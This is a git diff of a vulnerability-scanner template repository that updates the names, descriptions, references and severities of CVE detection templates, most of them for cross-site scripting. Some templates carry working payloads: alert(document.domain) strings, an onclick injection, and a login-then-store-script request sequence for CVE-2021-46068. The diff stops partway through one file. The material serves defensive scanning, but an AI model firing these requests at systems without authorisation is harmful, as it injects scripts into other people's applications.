+    Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 contain a cross-site scripting vulnerability due to improper input validation.
   reference:
     - https://support.citrix.com/article/CTX276688
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8191
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -39,4 +40,6 @@ requests:
       - type: word
         words:
           - "text/html"
-        part: header
\ No newline at end of file
+        part: header
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2020/CVE-2020-8512.yaml b/cves/2020/CVE-2020-8512.yaml
index 95f79987d4..5f20b27a10 100644
--- a/cves/2020/CVE-2020-8512.yaml
+++ b/cves/2020/CVE-2020-8512.yaml
@@ -1,15 +1,16 @@
 id: CVE-2020-8512
 
 info:
-  name: IceWarp WebMail XSS
+  name: IceWarp WebMail Server <=11.4.4.1 - Cross-Site Scripting
   author: pdteam,dwisiswant0
   severity: medium
-  description: In IceWarp Webmail Server through 11.4.4.1, there is XSS in the /webmail/ color parameter.
+  description: IceWarp Webmail Server through 11.4.4.1 contains a cross-site scripting vulnerability in the /webmail/ color parameter.
   reference:
     - https://www.exploit-db.com/exploits/47988
     - https://twitter.com/sagaryadav8742/status/1275170967527006208
     - https://cxsecurity.com/issue/WLB-2020010205
     - https://packetstormsecurity.com/files/156103/IceWarp-WebMail-11.4.4.1-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-8512
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -36,3 +37,5 @@ requests:
         words:
           - "text/html"
         part: header
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2020/CVE-2020-9036.yaml b/cves/2020/CVE-2020-9036.yaml
index 813e7d55ea..b7438ecc2d 100644
--- a/cves/2020/CVE-2020-9036.yaml
+++ b/cves/2020/CVE-2020-9036.yaml
@@ -1,10 +1,10 @@
 id: CVE-2020-9036
 
 info:
-  name: Jeedom through 4.0.38 allows XSS
+  name: Jeedom <=4.0.38 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: Jeedom through 4.0.38 allows XSS.
+  description: Jeedom through 4.0.38 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
   reference:
     - https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/
     - https://nvd.nist.gov/vuln/detail/CVE-2020-9036
@@ -35,3 +35,5 @@ requests:
         part: header
         words:
           - text/html
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2020/CVE-2020-9344.yaml b/cves/2020/CVE-2020-9344.yaml
index c9796dc0bd..6144d77e1d 100644
--- a/cves/2020/CVE-2020-9344.yaml
+++ b/cves/2020/CVE-2020-9344.yaml
@@ -1,14 +1,15 @@
 id: CVE-2020-9344
 
 info:
-  name: Jira Subversion ALM for enterprise XSS
+  name: Jira Subversion ALM for Enterprise <8.8.2 - Cross-Site Scripting
   author: madrobot
   severity: medium
-  description: Subversion ALM for the enterprise before 8.8.2 allows reflected XSS at multiple locations.
+  description: Jira Subversion ALM for Enterprise before 8.8.2 contains a cross-site scripting vulnerability at multiple locations.
   reference:
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9344
     - https://kintosoft.atlassian.net/wiki/spaces/SVNALM/pages/753565697/Security+Bulletin
     - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-007.txt
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-13483
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -39,4 +40,6 @@ requests:
       - type: word
         words:
           - "text/html"
-        part: header
\ No newline at end of file
+        part: header
+
+# Enhanced by md on 2022/09/02
diff --git a/cves/2020/CVE-2020-9496.yaml b/cves/2020/CVE-2020-9496.yaml
index d98d516ecd..de8d04bca1 100644
--- a/cves/2020/CVE-2020-9496.yaml
+++ b/cves/2020/CVE-2020-9496.yaml
@@ -1,15 +1,16 @@
 id: CVE-2020-9496
 
 info:
-  name: Apache OFBiz XML-RPC Java Deserialization
+  name: Apache OFBiz 17.12.03 - Cross-Site Scripting
   author: dwisiswant0
   severity: medium
-  description: XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03
+  description: Apache OFBiz 17.12.03 contains cross-site scripting and unsafe deserialization vulnerabilities via an XML-RPC request.
   reference:
     - http://packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.html
     - http://packetstormsecurity.com/files/161769/Apache-OFBiz-XML-RPC-Java-Deserialization.html
     - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz
     - https://s.apache.org/l0994
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-9496
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -43,3 +44,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by md on 2022/09/02
diff --git a/vulnerabilities/other/cisco-rv-series-rce.yaml b/cves/2021/CVE-2021-1472.yaml
similarity index 99%
rename from vulnerabilities/other/cisco-rv-series-rce.yaml
rename to cves/2021/CVE-2021-1472.yaml
index 9db36eeb38..09aede42dd 100644
--- a/vulnerabilities/other/cisco-rv-series-rce.yaml
+++ b/cves/2021/CVE-2021-1472.yaml
@@ -1,4 +1,4 @@
-id: cisco-rv-series-rce
+id: CVE-2021-1472
 
 info:
   name: Cisco Small Business RV Series - Authentication Bypass and Command Injection
diff --git a/cves/2021/CVE-2021-20137.yaml b/cves/2021/CVE-2021-20137.yaml
index 3f5f1d4614..a800f9e0f8 100644
--- a/cves/2021/CVE-2021-20137.yaml
+++ b/cves/2021/CVE-2021-20137.yaml
@@ -1,19 +1,19 @@
 id: CVE-2021-20137
 
 info:
-  name: Gryphon Tower - Reflected XSS
+  name: Gryphon Tower - Cross-Site Scripting
   author: edoardottt
   severity: medium
-  description: A reflected cross-site scripting vulnerability exists in the url parameter of the /cgi-bin/luci/site_access/ page on the Gryphon Tower router's web interface. An attacker could exploit this issue by tricking a user into following a specially crafted link, granting the attacker javascript execution in the context of the victim's browser.
+  description: Gryphon Tower router web interface contains a reflected cross-site scripting vulnerability in the url parameter of the /cgi-bin/luci/site_access/ page. An attacker can exploit this issue by tricking a user into following a specially crafted link, granting the attacker JavaScript execution in the victim's browser.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-20137
     cwe-id: CWE-79
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-20137
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20137
     - https://www.tenable.com/security/research/tra-2021-51
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-20137
   tags: xss,tenable,cve,cve2021,gryphon
 
 requests:
@@ -37,4 +37,6 @@ requests:
         words:
           - 'onfocus=alert(document.domain) autofocus=1>'
           - 'Send Access Request URL'
-        condition: and
\ No newline at end of file
+        condition: and
+
+# Enhanced by md on 2022/09/02
diff --git a/cves/2021/CVE-2021-20792.yaml b/cves/2021/CVE-2021-20792.yaml
index 15cb34cc8c..34ed24fd00 100644
--- a/cves/2021/CVE-2021-20792.yaml
+++ b/cves/2021/CVE-2021-20792.yaml
@@ -1,15 +1,15 @@
 id: CVE-2021-20792
 
 info:
-  name: Quiz And Survey Master < 7.1.14 - Reflected Cross-Site Scripting
+  name: WordPress Quiz and Survey Master <7.1.14 - Cross-Site Scripting
   author: dhiyaneshDK
   severity: medium
-  description: Cross-site scripting vulnerability in Quiz And Survey Master versions prior to 7.1.14 allows a remote attacker to inject arbitrary script via unspecified vectors."
+  description: WordPress Quiz and Survey Master plugin prior to 7.1.14 contains a cross-site scripting vulnerability which allows a remote attacker to inject arbitrary script via unspecified vectors.
   reference:
     - https://wpscan.com/vulnerability/4deb3464-00ed-483b-8d91-f9dffe2d57cf
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-20792
     - https://quizandsurveymaster.com/
     - https://jvn.jp/en/jp/JVN65388002/index.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-20792
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -48,3 +48,5 @@ requests:
         part: header
         words:
           - "text/html"
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2021/CVE-2021-21799.yaml b/cves/2021/CVE-2021-21799.yaml
index 341f896674..3c93d2ef05 100644
--- a/cves/2021/CVE-2021-21799.yaml
+++ b/cves/2021/CVE-2021-21799.yaml
@@ -1,14 +1,13 @@
 id: CVE-2021-21799
 
 info:
-  name: Advantech R-SeeNet v 2.4.12 - Cross Site Scripting
+  name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting
   author: arafatansari
   severity: medium
   description: |
-    Advantech R-SeeNet v 2.4.12 is vulnerable to Refleced Cross Site Scripting in the telnet_form.php script functionality.
+    Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the telnet_form.php script functionality.
   reference:
     - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21799
     - https://nvd.nist.gov/vuln/detail/CVE-2021-21799
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -40,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2021/CVE-2021-21800.yaml b/cves/2021/CVE-2021-21800.yaml
index 06774d245e..ad5eb3b23d 100644
--- a/cves/2021/CVE-2021-21800.yaml
+++ b/cves/2021/CVE-2021-21800.yaml
@@ -1,14 +1,13 @@
 id: CVE-2021-21800
 
 info:
-  name: Advantech R-SeeNet v 2.4.12 - Cross Site Scripting
+  name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting
   author: arafatansari
   severity: medium
   description: |
-    Advantech R-SeeNet v 2.4.12 is vulnerable to Refleced Cross Site Scripting in the ssh_form.php script functionality.
+    Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the ssh_form.php script functionality.
   reference:
     - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1271
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21800
     - https://nvd.nist.gov/vuln/detail/CVE-2021-21800
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@@ -40,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2021/CVE-2021-21801.yaml b/cves/2021/CVE-2021-21801.yaml
index 970f374b80..17e63785ed 100644
--- a/cves/2021/CVE-2021-21801.yaml
+++ b/cves/2021/CVE-2021-21801.yaml
@@ -1,13 +1,13 @@
 id: CVE-2021-21801
 
 info:
-  name: Advantech R-SeeNet graph parameter - Reflected Cross-Site Scripting (XSS)
+  name: Advantech R-SeeNet - Cross-Site Scripting
   author: gy741
   severity: medium
-  description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to
-    arbitrary JavaScript code execution.
+  description: Advantech R-SeeNet contains a cross-site scripting vulnerability in the device_graph_page.php script via the graph parameter. A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution.
   reference:
     - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-21801
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -37,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2021/CVE-2021-21802.yaml b/cves/2021/CVE-2021-21802.yaml
index df8b1fca2a..e7747ced21 100644
--- a/cves/2021/CVE-2021-21802.yaml
+++ b/cves/2021/CVE-2021-21802.yaml
@@ -1,13 +1,13 @@
 id: CVE-2021-21802
 
 info:
-  name: Advantech R-SeeNet device_id parameter - Reflected Cross-Site Scripting (XSS)
+  name: Advantech R-SeeNet - Cross-Site Scripting
   author: gy741
   severity: medium
-  description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to
-    arbitrary JavaScript code execution.
+  description: Advantech R-SeeNet contains a cross-site scripting vulnerability in the device_graph_page.php script via the device_id parameter. A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution.
   reference:
     - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-21801
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -37,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2021/CVE-2021-21803.yaml b/cves/2021/CVE-2021-21803.yaml
index f754602e3e..9b4a033bb7 100644
--- a/cves/2021/CVE-2021-21803.yaml
+++ b/cves/2021/CVE-2021-21803.yaml
@@ -1,13 +1,13 @@
 id: CVE-2021-21803
 
 info:
-  name: Advantech R-SeeNet is2sim parameter - Reflected Cross-Site Scripting (XSS)
+  name: Advantech R-SeeNet - Cross-Site Scripting
   author: gy741
   severity: medium
-  description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to
-    arbitrary JavaScript code execution.
+  description: Advantech R-SeeNet is vulnerable to cross-site scripting via the device_graph_page.php script via the is2sim parameter. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.
   reference:
     - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-21803
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -37,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2021/CVE-2021-22122.yaml b/cves/2021/CVE-2021-22122.yaml
index 85dce7a55f..77cad3e29d 100644
--- a/cves/2021/CVE-2021-22122.yaml
+++ b/cves/2021/CVE-2021-22122.yaml
@@ -1,16 +1,16 @@
 id: CVE-2021-22122
 
 info:
-  name: FortiWeb v6.3.x-6.2.x Unauthenticated XSS
+  name: FortiWeb - Cross-Site Scripting
   author: dwisiswant0
   severity: medium
   description: |
-    An improper neutralization of input during web page generation in FortiWeb GUI interface 6.3.0 through 6.3.7 and version before 6.2.4 may allow an unauthenticated,
-    remote attacker to perform a reflected cross site scripting attack (XSS) by injecting malicious payload in different vulnerable API end-points.
+    FortiWeb 6.3.0 through 6.3.7 and versions before 6.2.4 contain an unauthenticated cross-site scripting vulnerability. Improper neutralization of input during web page generation can allow a remote attacker to inject malicious payload in vulnerable API end-points.
   reference:
     - https://www.fortiguard.com/psirt/FG-IR-20-122
     - https://twitter.com/ptswarm/status/1357316793753362433
     - https://fortiguard.com/advisory/FG-IR-20-122
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-22122
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -31,3 +31,5 @@ requests:
           - "No policy has been chosen."
         condition: and
         part: body
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2021/CVE-2021-24176.yaml b/cves/2021/CVE-2021-24176.yaml
index a3117f0f79..c9dd9cfad4 100644
--- a/cves/2021/CVE-2021-24176.yaml
+++ b/cves/2021/CVE-2021-24176.yaml
@@ -1,14 +1,15 @@
 id: CVE-2021-24176
 
 info:
-  name: WordPress JH 404 Logger XSS
+  name: WordPress JH 404 Logger <=1.1 - Cross-Site Scripting
   author: Ganofins
   severity: medium
-  description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard.
+  description: WordPress JH 404 Logger plugin through 1.1 contains a cross-site scripting vulnerability. Referer and path of 404 pages are not properly sanitized when they are output in the WordPress dashboard, which can lead to executing arbitrary JavaScript code.
   reference:
     - https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585
     - https://wordpress.org/plugins/jh-404-logger/
     - https://ganofins.com/blog/my-first-cve-2021-24176/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24176
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 5.4
@@ -30,4 +31,6 @@ requests:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2021/CVE-2021-24235.yaml b/cves/2021/CVE-2021-24235.yaml
index fe99750610..7f3c226224 100644
--- a/cves/2021/CVE-2021-24235.yaml
+++ b/cves/2021/CVE-2021-24235.yaml
@@ -1,14 +1,14 @@
 id: CVE-2021-24235
 
 info:
-  name: Goto - Tour & Travel < 2.0 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Goto Tour & Travel Theme <2.0 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The Goto WordPress theme before 2.0 does not sanitise the keywords and start_date GET parameter on its Tour List page, leading to an unauthenticated reflected Cross-Site Scripting issue.
+  description: WordPress Goto Tour & Travel theme before 2.0 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize the keywords and start_date GET parameters on its Tour List page.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-24235
     - https://wpscan.com/vulnerability/eece90aa-582b-4c49-8b7c-14027f9df139
     - https://m0ze.ru/vulnerability/[2021-02-10]-[WordPress]-[CWE-79]-Goto-WordPress-Theme-v1.9.txt
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24235
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -38,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2021/CVE-2021-24237.yaml b/cves/2021/CVE-2021-24237.yaml
index 6eefaba392..14132c94b6 100644
--- a/cves/2021/CVE-2021-24237.yaml
+++ b/cves/2021/CVE-2021-24237.yaml
@@ -1,14 +1,14 @@
 id: CVE-2021-24237
 
 info:
-  name: Realteo WordPress Plugin <= 1.2.3 - Unauthenticated Reflected XSS
+  name: WordPress Realteo <=1.2.3 - Cross-Site Scripting
   author: 0x_Akoko
   severity: medium
-  description: The plugin, used by the Findeo Theme, did not properly sanitise the keyword_search, search_radius.
+  description: WordPress Realteo plugin 1.2.3 and prior contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of keyword_search, search_radius. _bedrooms and _bathrooms GET parameters before outputting them in its properties page.
   reference:
     - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e
     - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt
-    - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Findeo-WordPress-Theme-v1.3.0.txt
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24237
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -38,3 +38,5 @@ requests:
         words:
           - "text/html"
         part: header
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2021/CVE-2021-24245.yaml b/cves/2021/CVE-2021-24245.yaml
index 701b89e8b2..9e7991f39e 100644
--- a/cves/2021/CVE-2021-24245.yaml
+++ b/cves/2021/CVE-2021-24245.yaml
@@ -1,15 +1,14 @@
 id: CVE-2021-24245
 
 info:
-  name: WordPress Plugin Stop Spammers 2021.8 - Reflected XSS
+  name: WordPress Stop Spammers <2021.9 - Cross-Site Scripting
   author: edoardottt
   severity: medium
-  description: The Stop Spammers WordPress plugin before 2021.9 did not escape user input when blocking requests (such as matching a spam word), outputting it in an attribute after sanitising it to remove HTML tags, which is not sufficient and lead to a reflected Cross-Site Scripting issue.
+  description: WordPress Stop Spammers plugin before 2021.9 contains a reflected cross-site scripting vulnerability. It does not escape user input when blocking requests (such as matching a spam word), thus outputting it in an attribute after sanitizing it to remove HTML tags.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-24245
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24245
     - https://packetstormsecurity.com/files/162623/WordPress-Stop-Spammers-2021.8-Cross-Site-Scripting.html
     - https://wpscan.com/vulnerability/5e7accd6-08dc-4c6e-9d19-73e2d7e97735
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24245
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -41,4 +40,6 @@ requests:
       - type: word
         part: body
         words:
-          - "ad\" accesskey=X onclick=alert(1)"
\ No newline at end of file
+          - "ad\" accesskey=X onclick=alert(1)"
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2021/CVE-2021-24274.yaml b/cves/2021/CVE-2021-24274.yaml
index 2de17f84d6..3e73bf1e7a 100644
--- a/cves/2021/CVE-2021-24274.yaml
+++ b/cves/2021/CVE-2021-24274.yaml
@@ -1,14 +1,14 @@
 id: CVE-2021-24274
 
 info:
-  name: Ultimate Maps by Supsystic < 1.2.5 - Reflected Cross-Site scripting (XSS)
+  name: WordPress Supsystic Ultimate Maps <1.2.5 - Cross-Site Scripting
   author: dhiyaneshDK
   severity: medium
-  description: The Ultimate Maps by Supsystic WordPress plugin before 1.2.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
+  description: WordPress Supsystic Ultimate Maps plugin before 1.2.5 contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of the tab parameter on the options page before outputting it in an attribute.
   reference:
     - https://wpscan.com/vulnerability/200a3031-7c42-4189-96b1-bed9e0ab7c1d
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-24274
     - http://packetstormsecurity.com/files/164316/WordPress-Ultimate-Maps-1.2.4-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24274
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -36,3 +36,5 @@ requests:
         words:
           - "text/html"
         part: header
+
+# Enhanced by mp on 2022/09/02
diff --git a/cves/2021/CVE-2021-25075.yaml b/cves/2021/CVE-2021-25075.yaml
index 4871b7b607..faa9b997bb 100644
--- a/cves/2021/CVE-2021-25075.yaml
+++ b/cves/2021/CVE-2021-25075.yaml
@@ -3,7 +3,7 @@ id: CVE-2021-25075
 info:
   name: WordPress Duplicate Page or Post <1.5.1 - Cross-Site Scripting
   author: DhiyaneshDK
-  severity: low
+  severity: high
   description: |
     WordPress Duplicate Page or Post plugin before 1.5.1 contains a stored cross-site scripting vulnerability. The plugin does not have any authorization and has a flawed cross-site request forgery check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing unauthenticated users to call it and change the plugin's settings, or perform such attack via cross-site request forgery.
   reference:
diff --git a/cves/2021/CVE-2021-25120.yaml b/cves/2021/CVE-2021-25120.yaml
index d83d46faca..28aa3f7856 100644
--- a/cves/2021/CVE-2021-25120.yaml
+++ b/cves/2021/CVE-2021-25120.yaml
@@ -7,8 +7,8 @@ info:
   description: Easy Social Feed < 6.2.7 is susceptible to reflected cross-site scripting because the plugin does not sanitize and escape a parameter before outputting it back in an admin dashboard page, leading to it being executed in the context of a logged admin or editor.
   reference:
     - https://wpscan.com/vulnerability/6dd00198-ef9b-4913-9494-e08a95e7f9a0
-    - https://www.cvedetails.com/cve/CVE-2021-25120/
     - https://wpscan.com/vulnerability/0ad020b5-0d16-4521-8ea7-39cd206ab9f6
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-25120
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
diff --git a/cves/2021/CVE-2021-36749.yaml b/cves/2021/CVE-2021-36749.yaml
index e9af093e66..28545da8bb 100644
--- a/cves/2021/CVE-2021-36749.yaml
+++ b/cves/2021/CVE-2021-36749.yaml
@@ -6,7 +6,6 @@ info:
   severity: medium
   description: Apache Druid ingestion system is vulnerable to local file inclusion. The InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.
   reference:
-    - https://www.cvedetails.com/cve/CVE-2021-36749/
     - https://github.com/BrucessKING/CVE-2021-36749
     - https://lists.apache.org/thread.html/rc9400a70d0ec5cdb8a3486fc5ddb0b5282961c0b63e764abfbcb9f5d%40%3Cdev.druid.apache.org%3E
     - https://nvd.nist.gov/vuln/detail/CVE-2021-36749
diff --git a/cves/2021/CVE-2021-39501.yaml b/cves/2021/CVE-2021-39501.yaml
index 748fc229c4..2730857af7 100644
--- a/cves/2021/CVE-2021-39501.yaml
+++ b/cves/2021/CVE-2021-39501.yaml
@@ -7,8 +7,8 @@ info:
   description: EyouCMS 1.5.4 is vulnerable to an Open Redirect vulnerability. An attacker can redirect a user to a malicious url via the Logout function.
   reference:
     - https://github.com/eyoucms/eyoucms/issues/17
-    - https://www.cvedetails.com/cve/CVE-2021-39501
     - https://github.com/KietNA-HPT/CVE
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-39501
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
diff --git a/cves/2021/CVE-2021-46068.yaml b/cves/2021/CVE-2021-46068.yaml
index 83d616a5b5..7a775d927e 100644
--- a/cves/2021/CVE-2021-46068.yaml
+++ b/cves/2021/CVE-2021-46068.yaml
@@ -1,5 +1,5 @@
-id: CVE-2021-46068
-
+id: CVE-2021-46068
+
 info:
   name: Vehicle Service Management System - Stored Cross Site Scripting
   author: TenBird
@@ -19,35 +19,35 @@ info:
   metadata:
     verified: "true"
   tags: cve,cve2021,xss,vms,authenticated
-requests:
-  - raw:
-      - |
-        POST /classes/Login.php?f=login HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
-        username={{username}}&password={{password}}
-
-      - |
-        POST /classes/Users.php?f=save HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        id=1&firstname=Adminstrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin
-
-      - |
-        GET /admin/?page=user HTTP/1.1
-        Host: {{Hostname}}
-
-    req-condition: true
-    redirects: true
-    max-redirects: 2
-    cookie-reuse: true
-    matchers-condition: and
-    matchers:
-      - type: dsl
-        dsl:
-          - "contains(all_headers_3, 'text/html')"
-          - "status_code_3 == 200"
-          - 'contains(body_3, "Adminstrator\"><script>alert(document.domain)</script> Admin")'
-        condition: and
+requests:
+  - raw:
+      - |
+        POST /classes/Login.php?f=login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /classes/Users.php?f=save HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        id=1&firstname=Administrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin
+
+      - |
+        GET /admin/?page=user HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(all_headers_3, 'text/html')"
+          - "status_code_3 == 200"
+          - 'contains(body_3, "Administrator\"><script>alert(document.domain)</script> Admin")'
+        condition: and
diff --git a/cves/2021/CVE-2021-46069.yaml b/cves/2021/CVE-2021-46069.yaml
index b61b16ef58..9943541cc8 100644
--- a/cves/2021/CVE-2021-46069.yaml
+++ b/cves/2021/CVE-2021-46069.yaml
@@ -1,53 +1,53 @@
-id: CVE-2021-46069
-
-info:
-  name: Vehicle Service Management System - Stored Cross Site Scripting
-  author: TenBird
-  severity: medium
-  description: |
-    A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the Mechanic List Section in login panel.
-  reference:
